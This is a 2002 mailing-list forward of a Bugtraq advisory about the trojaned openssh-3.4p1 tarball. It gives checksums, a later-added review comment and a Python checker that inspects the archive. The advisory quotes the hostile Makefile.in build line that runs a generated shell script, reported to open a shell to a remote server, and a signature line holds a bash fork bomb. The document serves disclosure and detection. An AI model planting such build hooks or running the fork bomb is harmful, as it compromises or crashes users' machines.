Date:      Sun, 04 Aug 2002 14:07:09 -0700
From:      Karl Agee <kdagee@attglobal.net>
To:        FreeBSD-Questions@FreeBSD.ORG, freebsd-current@freebsd.org
Subject:   Fwd: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz distribution recently trojaned] !!!!
Message-ID:  <5.1.0.14.0.20020804140610.040fcd10@pop1.attglobal.net>

FYI....from my Linux User Group maillist.

--karl

>Date: Thu, 1 Aug 2002 13:20:48 -0700
>From: Ed <ekg@tricity.wsu.edu>
>To: 3clug@3clug.org
>Subject: <3CLUG> !!!! [mikael.olsson@clavister.com: openssh-3.4p1.tar.gz 
>distribution recently trojaned] !!!!
>Mail-Followup-To: 3clug@3clug.org
>User-Agent: Mutt/1.2.5.1i
>Sender: owner-3clug@quince.tricity.wsu.edu
>
>
>if you didn't know this already, some copies of the source distribution
>of openssh are *trojaned*!  the _untrojaned_ version has this md5 sum:
>459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to
>check it).  the trojan horse connects to a computer in australia and
>opens a shell on the local machine.
>
>   Ed
>
>----- Forwarded message from Mikael Olsson <mikael.olsson@clavister.com> -----
>
>Date: Thu, 01 Aug 2002 13:20:47 +0200
>From: Mikael Olsson <mikael.olsson@clavister.com>
>Organization: Clavister AB
>To: bugtraq@securityfocus.com
>Subject: openssh-3.4p1.tar.gz distribution recently trojaned
>X-MailScanner: Found to be clean
>
>
>From
>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>
>----- Forwarded message from Edwin Groothuis <edwin@mavetju.org> -----
>
>Date: Thu, 1 Aug 2002 16:55:51 +1000
>From: Edwin Groothuis <edwin@mavetju.org>
>To: incidents@securityfocus.com
>Subject: openssh-3.4p1.tar.gz trojaned
>
>Greetings,
>
>Just want to inform you that the OpenSSH package on ftp.openbsd.org
>(and probably all its mirrors now) is trojaned:
>
>     ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>
>The OpenBSD people have been informed about it (via email to
>deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
>
>
>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
>+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
>./bf-test.out &
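Review bot: the added recipe line under `all:` compiles bf-test.c, runs the resulting binary, and feeds its output to `sh` in the background, with the leading `@` keeping make from echoing the command. A target whose only stated prerequisite is libopenbsd-compat.a has no reason to execute a generated shell script at build time, so this line should be dropped and any tree built from a tarball containing it treated as untrusted.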
>
>bf-test.c[1] is nothing more than a wrapper which generates a
>shell-script[2] which compiles itself and tries to connect to a
>server running on 203.62.158.32:6667 (web.snsonline.net).
>
>[1] http://www.mavetju.org/~edwin/bf-test.c
>[2] http://www.mavetju.org/~edwin/bf-output.sh
>
>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
>ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
>
>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
>
>Edwin
>
>--
>Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
>edwin@mavetju.org    |    Weblog: http://www.mavetju.org/weblog/weblog.php
>bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/
>
>----- End forwarded message -----
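
The check described in the forwarded report, as an added example that is not part of the original messages: it compares a tarball's MD5 with the two digests quoted above and lists any openbsd-compat/Makefile.in lines that mention bf-test, reading the archive without extracting or building it. The function names, the `bf-test` substring heuristic and the sample archives are assumptions constructed for illustration.

```python
import hashlib
import io
import tarfile

# Digests quoted in the forwarded report.
KNOWN_GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
KNOWN_TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"
# Member path and recipe line from the reported Makefile.in change.
MAKEFILE_MEMBER = "openssh-3.4p1/openbsd-compat/Makefile.in"
REPORTED_LINE = "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &"
INDICATOR = "bf-test"  # assumption: a clean Makefile.in never mentions it

def classify_digest(data):
    """Compare the tarball's MD5 with the two digests from the report."""
    digest = hashlib.md5(data).hexdigest()
    if digest == KNOWN_GOOD_MD5:
        return "matches-known-good"
    if digest == KNOWN_TROJANED_MD5:
        return "matches-known-trojaned"
    return "unknown"  # neither digest: do not build until the source is verified

def suspicious_makefile_lines(data):
    """Return Makefile.in lines mentioning bf-test; nothing is extracted to disk."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if member.isfile() and member.name == MAKEFILE_MEMBER:
                text = tar.extractfile(member).read().decode("utf-8", "replace")
                hits += [ln.strip() for ln in text.splitlines() if INDICATOR in ln]
    return hits

def build_sample(recipe_lines):
    """Constructed input: a tiny .tar.gz that holds only a Makefile.in."""
    body = "\n".join(["all: libopenbsd-compat.a"] + recipe_lines).encode() + b"\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(MAKEFILE_MEMBER)
        info.size = len(body)
        tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()

if __name__ == "__main__":
    for label, lines in (("clean sample", []), ("tampered sample", [REPORTED_LINE])):
        blob = build_sample(lines)
        print(label, classify_digest(blob), suspicious_makefile_lines(blob))
```

For a real download, read the file's bytes and pass them to both functions; only the `matches-known-good` result ties the file to the digest the FreeBSD ports system records.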


